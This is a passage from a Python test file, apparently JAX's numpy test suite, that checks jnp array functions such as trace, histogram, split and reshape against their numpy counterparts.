    for shape in [shape for shape in all_shapes if len(shape) >= 2]
    for axis1 in range(-len(shape), len(shape))
    for axis2 in range(-len(shape), len(shape))
    # axis1 and axis2 must name distinct dimensions (modulo rank).
    if (axis1 % len(shape)) != (axis2 % len(shape))
    for offset in list(range(-4, 4))))
def testTrace(self, shape, dtype, out_dtype, offset, axis1, axis2):
  """Check jnp.trace against np.trace for all axis pairs, offsets, dtypes."""
  rng = jtu.rand_default(self.rng())
  def np_fun(arg):
    if out_dtype == jnp.bfloat16:
      # numpy cannot accumulate in bfloat16; accumulate in f32 then cast.
      return np.trace(arg, offset, axis1, axis2, np.float32).astype(jnp.bfloat16)
    else:
      return np.trace(arg, offset, axis1, axis2, out_dtype)
  jnp_fun = lambda arg: jnp.trace(arg, offset, axis1, axis2, out_dtype)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_a={}_v={}_side={}".format(
        jtu.format_shape_dtype_string(ashape, dtype),
        jtu.format_shape_dtype_string(vshape, dtype),
        side), "ashape": ashape, "vshape": vshape, "side": side,
     "dtype": dtype}
    for ashape in [(15,), (16,), (17,)]
    for vshape in [(), (5,), (5, 5)]
    for side in ['left', 'right']
    for dtype in default_dtypes
    ))
def testSearchsorted(self, ashape, vshape, side, dtype):
  """jnp.searchsorted matches np.searchsorted for sorted input and both sides."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [np.sort(rng(ashape, dtype)), rng(vshape, dtype)]
  reference = partial(np.searchsorted, side=side)
  tested = partial(jnp.searchsorted, side=side)
  self._CheckAgainstNumpy(reference, tested, make_args)
  self._CompileAndCheck(tested, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_bins={}_right={}_reverse={}".format(
        jtu.format_shape_dtype_string(xshape, dtype),
        jtu.format_shape_dtype_string(binshape, dtype),
        right, reverse), "xshape": xshape, "binshape": binshape,
     "right": right, "reverse": reverse, "dtype": dtype}
    for xshape in [(20,), (5, 4)]
    for binshape in [(1,), (5,)]
    for right in [True, False]
    for reverse in [True, False]
    for dtype in default_dtypes
    ))
def testDigitize(self, xshape, binshape, right, reverse, dtype):
  """Check jnp.digitize against np.digitize with ascending/descending bins."""
  # `order` is a slice that optionally reverses the sorted bins, so both
  # monotonically increasing and decreasing bin arrays are exercised.
  order = jax.ops.index[::-1] if reverse else jax.ops.index[:]
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(xshape, dtype), jnp.sort(rng(binshape, dtype))[order]]
  np_fun = lambda x, bins: np.digitize(x, bins, right=right)
  jnp_fun = lambda x, bins: jnp.digitize(x, bins, right=right)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_array={}".format(
        jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
     "shape": shape, "dtypes": dtypes, "array_input": array_input}
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
    for shape in [(), (2,), (3, 4), (1, 5)]
    for array_input in [True, False]))
def testColumnStack(self, shape, dtypes, array_input):
  """Check jnp.column_stack against np.column_stack.

  Inputs are either a list of arrays or a single stacked ndarray
  (`array_input`), with mixed dtypes to exercise promotion.
  """
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(np.column_stack)
  jnp_fun = jnp.column_stack
  # Numpy reference goes first: _CheckAgainstNumpy takes
  # (numpy_reference_op, lax_op, ...), consistent with every other call here.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_array={}".format(
        jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), axis, array_input),
     "shape": shape, "axis": axis, "dtypes": dtypes, "array_input": array_input}
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
    for shape in [(), (2,), (3, 4), (1, 100)]
    for axis in range(-len(shape), len(shape) + 1)
    for array_input in [True, False]))
def testStack(self, shape, axis, dtypes, array_input):
  """Check jnp.stack against np.stack over all stacking axes.

  Inputs are either a list of arrays or a single stacked ndarray
  (`array_input`), with mixed dtypes to exercise promotion.
  """
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(partial(np.stack, axis=axis))
  jnp_fun = partial(jnp.stack, axis=axis)
  # Numpy reference goes first: _CheckAgainstNumpy takes
  # (numpy_reference_op, lax_op, ...), consistent with every other call here.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_op={}_{}_array={}".format(
        op, jtu.format_test_name_suffix("", [shape] * len(dtypes), dtypes), array_input),
     "shape": shape, "op": op, "dtypes": dtypes, "array_input": array_input}
    for op in ["hstack", "vstack", "dstack"]
    for dtypes in [
      [np.float32],
      [np.float32, np.float32],
      [np.float32, np.int32, np.float32],
      [np.float32, np.int64, np.float32],
      [np.float32, np.int32, np.float64],
    ]
    for shape in [(), (2,), (3, 4), (1, 100), (2, 3, 4)]
    for array_input in [True, False]))
def testHVDStack(self, shape, op, dtypes, array_input):
  """Check jnp.hstack/vstack/dstack against their numpy counterparts.

  Inputs are either a list of arrays or a single stacked ndarray
  (`array_input`), with mixed dtypes to exercise promotion.
  """
  rng = jtu.rand_default(self.rng())
  if array_input:
    args_maker = lambda: [np.array([rng(shape, dtype) for dtype in dtypes])]
  else:
    args_maker = lambda: [[rng(shape, dtype) for dtype in dtypes]]
  np_fun = _promote_like_jnp(getattr(np, op))
  jnp_fun = getattr(jnp, op)
  # Numpy reference goes first: _CheckAgainstNumpy takes
  # (numpy_reference_op, lax_op, ...), consistent with every other call here.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_inshape={}_outdtype={}_fillshape={}".format(
        jtu.format_shape_dtype_string(shape, fill_value_dtype),
        np.dtype(out_dtype).name if out_dtype else "None",
        fill_value_shape),
     "fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
     "shape": shape, "out_dtype": out_dtype}
    # Shapes include a bare int and a numpy scalar to test shape coercion.
    for shape in array_shapes + [3, np.array(7, dtype=np.int32)]
    for fill_value_dtype in default_dtypes
    for fill_value_shape in _compatible_shapes(shape)
    for out_dtype in [None] + default_dtypes))
def testFull(self, shape, fill_value_dtype, fill_value_shape, out_dtype):
  """Check jnp.full against np.full, including broadcastable fill values."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda fill_value: np.full(shape, fill_value, dtype=out_dtype)
  jnp_fun = lambda fill_value: jnp.full(shape, fill_value, dtype=out_dtype)
  args_maker = lambda: [rng(fill_value_shape, fill_value_dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
    "testcase_name": "_shape={}_n={}_axis={}_prepend={}_append={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        n, axis, prepend, append),
    "shape": shape, "dtype": dtype, "n": n, "axis": axis,
    "prepend": prepend, "append": append
} for shape, dtype in s(_shape_and_dtypes(nonempty_nonscalar_array_shapes, default_dtypes))
  for n in s([0, 1, 2])
  for axis in s(list(range(-len(shape), max(1, len(shape)))))
  for prepend in s([None, 1, np.zeros(shape, dtype=dtype)])
  for append in s([None, 1, np.zeros(shape, dtype=dtype)])
)))
def testDiff(self, shape, dtype, n, axis, prepend, append):
  """Check jnp.diff against np.diff, including prepend/append variants."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]

  def np_fun(x, n=n, axis=axis, prepend=prepend, append=append):
    # numpy uses the private sentinel np._NoValue (not None) to mean
    # "argument not supplied"; map None to it explicitly.
    if prepend is None:
      prepend = np._NoValue
    elif not np.isscalar(prepend) and prepend.dtype == jnp.bfloat16:
      # numpy cannot compute in bfloat16; round-trip through float32.
      prepend = prepend.astype(np.float32)

    if append is None:
      append = np._NoValue
    elif not np.isscalar(append) and append.dtype == jnp.bfloat16:
      append = append.astype(np.float32)

    if x.dtype == jnp.bfloat16:
      return np.diff(x.astype(np.float32), n=n, axis=axis, prepend=prepend, append=append).astype(jnp.bfloat16)
    else:
      return np.diff(x, n=n, axis=axis, prepend=prepend, append=append)

  jnp_fun = lambda x: jnp.diff(x, n=n, axis=axis, prepend=prepend, append=append)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
    jtu.cases_from_list(
        {"testcase_name": ("_op={}_shape={}_dtype={}").format(op, shape, dtype),
         "np_op": getattr(np, op), "jnp_op": getattr(jnp, op),
         "shape": shape, "dtype": dtype}
        # Shapes include bare ints and numpy scalars to test shape coercion.
        for op in ["zeros", "ones"]
        for shape in [2, (), (2,), (3, 0), np.array((4, 5, 6), dtype=np.int32),
                      np.array(4, dtype=np.int32)]
        for dtype in all_dtypes))
def testZerosOnes(self, np_op, jnp_op, shape, dtype):
  """Check jnp.zeros/ones against numpy for assorted shape specifications."""
  args_maker = lambda: []
  np_op = partial(np_op, shape, dtype)
  jnp_op = partial(jnp_op, shape, dtype)
  self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
  self._CompileAndCheck(jnp_op, args_maker)
def testOnesWithInvalidShape(self):
  """jnp.ones must reject shapes containing a negative dimension."""
  self.assertRaises(TypeError, jnp.ones, (-1, 1))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
    "testcase_name": "_inshape={}_filldtype={}_fillshape={}_outdtype={}_outshape={}".format(
        jtu.format_shape_dtype_string(shape, in_dtype),
        np.dtype(fill_value_dtype).name, fill_value_shape,
        np.dtype(out_dtype).name, out_shape),
    "shape": shape, "in_dtype": in_dtype,
    "fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
    "out_dtype": out_dtype, "out_shape": out_shape
} for shape in s(array_shapes)
  for out_shape in s([None] + array_shapes)
  for in_dtype in s(default_dtypes)
  for fill_value_dtype in s(default_dtypes)
  for fill_value_shape in s(_compatible_shapes(shape if out_shape is None else out_shape))
  for out_dtype in s(default_dtypes))))
def testFullLike(self, shape, in_dtype, fill_value_dtype, fill_value_shape, out_dtype, out_shape):
  """Check jnp.full_like against np.full_like with dtype/shape overrides."""
  if numpy_version < (1, 19) and out_shape == ():
    raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x, fill_value: np.full_like(
      x, fill_value, dtype=out_dtype, shape=out_shape)
  jnp_fun = lambda x, fill_value: jnp.full_like(
      x, fill_value, dtype=out_dtype, shape=out_shape)
  args_maker = lambda: [rng(shape, in_dtype), rng(fill_value_shape, fill_value_dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_func={}_inshape={}_outshape={}_outdtype={}".format(
        func, jtu.format_shape_dtype_string(shape, in_dtype),
        out_shape, out_dtype),
     "func": func, "shape": shape, "in_dtype": in_dtype,
     "out_shape": out_shape, "out_dtype": out_dtype}
    for shape in array_shapes
    for out_shape in [None] + array_shapes
    for in_dtype in default_dtypes
    for func in ["ones_like", "zeros_like"]
    for out_dtype in default_dtypes))
def testZerosOnesLike(self, func, shape, in_dtype, out_shape, out_dtype):
  """Check jnp.zeros_like/ones_like against numpy with dtype/shape overrides."""
  if numpy_version < (1, 19) and out_shape == ():
    raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: getattr(np, func)(x, dtype=out_dtype, shape=out_shape)
  jnp_fun = lambda x: getattr(jnp, func)(x, dtype=out_dtype, shape=out_shape)
  args_maker = lambda: [rng(shape, in_dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_func={}_inshape={}_weak_type={}_outshape={}_outdtype={}".format(
        func, jtu.format_shape_dtype_string(shape, in_dtype),
        weak_type, out_shape, out_dtype),
     "func": func, "args": args,
     "shape": shape, "in_dtype": in_dtype, "weak_type": weak_type,
     "out_shape": out_shape, "out_dtype": out_dtype}
    for shape in array_shapes
    for in_dtype in [np.int32, np.float32, np.complex64]
    for weak_type in [True, False]
    for out_shape in [None, (), (10,)]
    # `args` holds the extra positional arguments each function takes
    # (full_like needs a fill value; the others take none).
    for func, args in [("full_like", (-100,)), ("ones_like", ()), ("zeros_like", ())]
    for out_dtype in [None, float]))
def testZerosOnesFullLikeWeakType(self, func, args, shape, in_dtype, weak_type, out_shape, out_dtype):
  """Weak typing of *_like outputs: preserved iff no explicit dtype is given."""
  if numpy_version < (1, 19) and out_shape == ():
    raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
  rng = jtu.rand_default(self.rng())
  x = lax._convert_element_type(rng(shape, in_dtype), weak_type=weak_type)
  fun = lambda x: getattr(jnp, func)(x, *args, dtype=out_dtype, shape=out_shape)
  expected_weak_type = weak_type and (out_dtype is None)
  self.assertEqual(dtypes.is_weakly_typed(fun(x)), expected_weak_type)
  self.assertEqual(dtypes.is_weakly_typed(api.jit(fun)(x)), expected_weak_type)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_funcname={}_input_type={}_val={}_dtype={}".format(
          funcname, input_type, val, dtype),
       "funcname": funcname, "input_type": input_type, "val": val, "dtype": dtype}
      for funcname in ["array", "asarray"]
      for dtype in [int, float, None]
      for val in [0, 1]
      for input_type in [int, float, np.int32, np.float32]))
  def testArrayWeakType(self, funcname, input_type, val, dtype):
    """Checks weak typing of jnp.array/asarray, eager and under jit."""
    func = lambda x: getattr(jnp, funcname)(x, dtype=dtype)
    fjit = api.jit(func)
    val = input_type(val)
    # Python scalars (members of dtypes._weak_types) stay weak unless a
    # dtype is explicitly requested.
    expected_weak_type = dtype is None and input_type in set(dtypes._weak_types)
    self.assertEqual(dtypes.is_weakly_typed(func(val)), expected_weak_type)
    self.assertEqual(dtypes.is_weakly_typed(fjit(val)), expected_weak_type)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_weak_type={}_slc={}".format(
          jtu.format_shape_dtype_string(shape, dtype), weak_type, slc),
       "shape": shape, "dtype": dtype, "weak_type": weak_type, "slc": slc}
      for shape in nonempty_nonscalar_array_shapes
      for dtype in [int, float, complex]
      for weak_type in [True, False]
      for slc in [slice(None), slice(0), slice(3), 0, ...]))
  def testSliceWeakTypes(self, shape, dtype, weak_type, slc):
    """Indexing/slicing must preserve the operand's weak type."""
    rng = jtu.rand_default(self.rng())
    x = lax._convert_element_type(rng(shape, dtype), weak_type=weak_type)
    op = lambda x: x[slc]
    self.assertEqual(op(x).aval.weak_type, weak_type)
    self.assertEqual(api.jit(op)(x).aval.weak_type, weak_type)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_{}sections".format(
          jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
       "shape": shape, "num_sections": num_sections, "axis": axis,
       "dtype": dtype}
      for shape, axis, num_sections in [
          ((3,), 0, 3), ((12,), 0, 3), ((12, 4), 0, 4), ((12, 4), 1, 2),
          ((2, 3, 4), -1, 2), ((2, 3, 4), -2, 3)]
      for dtype in default_dtypes))
  def testSplitStaticInt(self, shape, num_sections, axis, dtype):
    """Checks jnp.split with a static integer section count against np.split."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.split(x, num_sections, axis=axis)
    jnp_fun = lambda x: jnp.split(x, num_sections, axis=axis)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_{}sections".format(
          jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
       "shape": shape, "num_sections": num_sections, "axis": axis, "dtype": dtype}
      # All testcases split the specified axis unequally
      for shape, axis, num_sections in [
          ((3,), 0, 2), ((12,), 0, 5), ((12, 4), 0, 7), ((12, 4), 1, 3),
          ((2, 3, 5), -1, 2), ((2, 4, 4), -2, 3), ((7, 2, 2), 0, 3)]
      for dtype in default_dtypes))
  def testArraySplitStaticInt(self, shape, num_sections, axis, dtype):
    """Checks jnp.array_split (unequal splits allowed) against np.array_split."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.array_split(x, num_sections, axis=axis)
    jnp_fun = lambda x: jnp.array_split(x, num_sections, axis=axis)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  def testSplitTypeError(self):
    """jnp.split must reject abstract tracers for indices_or_sections but
    accept concrete arrays and concrete tracers."""
    # If we pass an ndarray for indices_or_sections -> no error
    self.assertEqual(3, len(jnp.split(jnp.zeros(3), jnp.array([1, 2]))))
    CONCRETIZATION_MSG = "Abstract tracer value encountered where concrete value is expected."
    with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
      # An abstract tracer for idx
      api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), idx))(2.)
    with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
      # A list including an abstract tracer
      api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), [2, idx]))(2.)
    # A concrete tracer -> no error
    api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), idx),
            (2.,), (1.,))
    # A tuple including a concrete tracer -> no error
    api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), (1, idx)),
            (2.,), (1.,))
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_bins={}_range={}_weights={}".format(
          jtu.format_shape_dtype_string(shape, dtype), bins, range, weights),
       "shape": shape,
       "dtype": dtype,
       "bins": bins,
       "range": range,
       "weights": weights,
      }
      for shape in [(5,), (5, 5)]
      for dtype in number_dtypes
      for bins in [10, np.arange(-5, 6), [-5, 0, 3]]
      for range in [None, (0, 0), (0, 10)]
      for weights in [True, False]
  ))
  def testHistogramBinEdges(self, shape, dtype, bins, range, weights):
    """Checks jnp.histogram_bin_edges against np.histogram_bin_edges."""
    rng = jtu.rand_default(self.rng())
    # np.histogram_bin_edges requires non-negative weights.
    _weights = lambda w: abs(w) if weights else None
    np_fun = lambda a, w, r: np.histogram_bin_edges(a, bins=bins, range=r,
                                                    weights=_weights(w))
    jnp_fun = lambda a, w, r: jnp.histogram_bin_edges(a, bins=bins, range=r,
                                                      weights=_weights(w))
    args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), range]
    tol = {jnp.bfloat16: 2E-2, np.float16: 1E-2}
    # linspace() compares poorly to numpy when using bfloat16
    if dtype != jnp.bfloat16:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker,
                          atol=tol, rtol=tol)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_bins={}_density={}_weights={}".format(
          jtu.format_shape_dtype_string(shape, dtype), bins, density, weights),
       "shape": shape,
       "dtype": dtype,
       "bins": bins,
       "density": density,
       "weights": weights,
      }
      for shape in [(5,), (5, 5)]
      for dtype in default_dtypes
      # We only test explicit integer-valued bin edges because in other cases
      # rounding errors lead to flaky tests.
      for bins in [np.arange(-5, 6), [-5, 0, 3]]
      for density in [True, False]
      for weights in [True, False]
  ))
  def testHistogram(self, shape, dtype, bins, density, weights):
    """Checks jnp.histogram against np.histogram with explicit bin edges."""
    rng = jtu.rand_default(self.rng())
    # np.histogram requires non-negative weights.
    _weights = lambda w: abs(w) if weights else None
    np_fun = lambda a, w: np.histogram(a, bins=bins, density=density,
                                         weights=_weights(w))
    jnp_fun = lambda a, w: jnp.histogram(a, bins=bins, density=density,
                                         weights=_weights(w))
    args_maker = lambda: [rng(shape, dtype), rng(shape, dtype)]
    tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
    # np.searchsorted errors on bfloat16 with
    # "TypeError: invalid type promotion with custom data type"
    if dtype != jnp.bfloat16:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                              tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_bins={}_weights={}_density={}".format(
          jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
       "shape": shape,
       "dtype": dtype,
       "bins": bins,
       "weights": weights,
       "density": density
      }
      for shape in [(5,), (12,)]
      for dtype in int_dtypes
      for bins in [2, [2, 2], [[0, 1, 3, 5], [0, 2, 3, 4, 6]]]
      for weights in [False, True]
      for density in [False, True]
  ))
  def testHistogram2d(self, shape, dtype, bins, weights, density):
    """Checks jnp.histogram2d against np.histogram2d."""
    rng = jtu.rand_default(self.rng())
    # np.histogram2d requires non-negative weights.
    _weights = lambda w: abs(w) if weights else None
    np_fun = lambda a, b, w: np.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
    jnp_fun = lambda a, b, w: jnp.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
    args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), rng(shape, dtype)]
    tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
    # np.searchsorted errors on bfloat16 with
    # "TypeError: invalid type promotion with custom data type"
    # density=True may divide by zero for empty bins; silence those warnings.
    with np.errstate(divide='ignore', invalid='ignore'):
      if dtype != jnp.bfloat16:
        self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                                tol=tol)
      self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_bins={}_weights={}_density={}".format(
          jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
       "shape": shape,
       "dtype": dtype,
       "bins": bins,
       "weights": weights,
       "density": density
      }
      for shape in [(5, 3), (10, 3)]
      for dtype in int_dtypes
      for bins in [(2, 2, 2), [[-5, 0, 4], [-4, -1, 2], [-6, -1, 4]]]
      for weights in [False, True]
      for density in [False, True]
  ))
  def testHistogramdd(self, shape, dtype, bins, weights, density):
    """Checks jnp.histogramdd against np.histogramdd."""
    rng = jtu.rand_default(self.rng())
    # np.histogramdd requires non-negative weights.
    _weights = lambda w: abs(w) if weights else None
    np_fun = lambda a, w: np.histogramdd(a, bins=bins, weights=_weights(w), density=density)
    jnp_fun = lambda a, w: jnp.histogramdd(a, bins=bins, weights=_weights(w), density=density)
    args_maker = lambda: [rng(shape, dtype), rng((shape[0],), dtype)]
    tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
    # np.searchsorted errors on bfloat16 with
    # "TypeError: invalid type promotion with custom data type"
    if dtype != jnp.bfloat16:
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                              tol=tol)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_{}_axis={}_{}sections".format(
          jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
       "shape": shape, "num_sections": num_sections, "axis": axis,
       "dtype": dtype}
      for shape, axis, num_sections in [
          ((12, 4), 0, 4), ((12, 4), 1, 2),
          ((2, 3, 4), 2, 2), ((4, 3, 4), 0, 2)]
      for dtype in default_dtypes))
  def testHVDSplit(self, shape, num_sections, axis, dtype):
    """Checks jnp.vsplit/hsplit/dsplit against their NumPy counterparts."""
    rng = jtu.rand_default(self.rng())
    def fn(module, axis):
      # Map the split axis to the corresponding convenience function:
      # axis 0 -> vsplit, axis 1 -> hsplit, axis 2 -> dsplit.
      if axis == 0:
        return module.vsplit
      elif axis == 1:
        return module.hsplit
      else:
        assert axis == 2
        return module.dsplit
    np_fun = lambda x: fn(np, axis)(x, num_sections)
    jnp_fun = lambda x: fn(jnp, axis)(x, num_sections)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_inshape={}_outshape={}_order={}".format(
          jtu.format_shape_dtype_string(arg_shape, dtype),
          jtu.format_shape_dtype_string(out_shape, dtype),
          order),
       "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype,
       "order": order}
      for dtype in default_dtypes
      for order in ["C", "F"]
      for arg_shape, out_shape in [
          (jtu.NUMPY_SCALAR_SHAPE, (1, 1, 1)),
          ((), (1, 1, 1)),
          ((7, 0), (0, 42, 101)),
          ((3, 4), 12),
          ((3, 4), (12,)),
          ((3, 4), -1),
          ((2, 1, 4), (-1,)),
          ((2, 2, 4), (2, 8))
      ]))
  def testReshape(self, arg_shape, out_shape, dtype, order):
    """Checks jnp.reshape (C and F order, -1 dims, 0-size arrays) vs np."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.reshape(x, out_shape, order=order)
    jnp_fun = lambda x: jnp.reshape(x, out_shape, order=order)
    args_maker = lambda: [rng(arg_shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_inshape={}_outshape={}".format(
          jtu.format_shape_dtype_string(arg_shape, dtype),
          jtu.format_shape_dtype_string(out_shape, dtype)),
       "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
      for dtype in default_dtypes
      for arg_shape, out_shape in [
          ((7, 0), (0, 42, 101)),
          ((2, 1, 4), (-1,)),
          ((2, 2, 4), (2, 8))
      ]))
  def testReshapeMethod(self, arg_shape, out_shape, dtype):
    """Checks the x.reshape(*dims) method form (unpacked args) vs np.reshape."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.reshape(x, out_shape)
    jnp_fun = lambda x: x.reshape(*out_shape)
    args_maker = lambda: [rng(arg_shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_inshape={}_outshape={}".format(
          jtu.format_shape_dtype_string(arg_shape, dtype),
          jtu.format_shape_dtype_string(out_shape, dtype)),
       "arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
      for dtype in default_dtypes
      for arg_shape, out_shape in itertools.product(all_shapes, array_shapes)))
  def testResize(self, arg_shape, out_shape, dtype):
    """Checks jnp.resize against np.resize over all shape combinations."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.resize(x, out_shape)
    jnp_fun = lambda x: jnp.resize(x, out_shape)
    args_maker = lambda: [rng(arg_shape, dtype)]
    # NumPy < 1.20 disagrees for zero-size output shapes; skip the comparison.
    if len(out_shape) > 0 or numpy_version >= (1, 20, 0):
      self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
  @parameterized.named_parameters(jtu.cases_from_list(
      {"testcase_name": "_inshape={}_expanddim={!r}".format(
          jtu.format_shape_dtype_string(arg_shape, dtype), dim),
       "arg_shape": arg_shape, "dtype": dtype, "dim": dim}
      for arg_shape in [(), (3,), (3, 4)]
      for dtype in default_dtypes
      for dim in (list(range(-len(arg_shape)+1, len(arg_shape)))
                  + [np.array(0), np.array(-1), (0,), [np.array(0)],
                     (len(arg_shape), len(arg_shape) + 1)])))
  def testExpandDimsStaticDim(self, arg_shape, dtype, dim):
    """Checks jnp.expand_dims with ints, np scalars, tuples, and lists of axes."""
    rng = jtu.rand_default(self.rng())
    np_fun = lambda x: np.expand_dims(x, dim)
    jnp_fun = lambda x: jnp.expand_dims(x, dim)
    args_maker = lambda: [rng(arg_shape, dtype)]
    self._CompileAndCheck(jnp_fun, args_maker)
    if isinstance(dim, (tuple, list)) and numpy_version < (1, 18, 0):
      raise SkipTest("support for multiple axes added in NumPy 1.18.0")
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_axes=({},{})".format(
jtu.format_shape_dtype_string(arg_shape, dtype), ax1, ax2),
"arg_shape": arg_shape, "dtype": dtype, "ax1": ax1, "ax2": ax2}
for arg_shape, ax1, ax2 in [
((3, 4), 0, 1), ((3, 4), 1, 0), ((3, 4, 5), 1, 2),
((3, 4, 5), -1, -2), ((3, 4, 5), 0, 1)]
for dtype in default_dtypes))
def testSwapAxesStaticAxes(self, arg_shape, dtype, ax1, ax2):
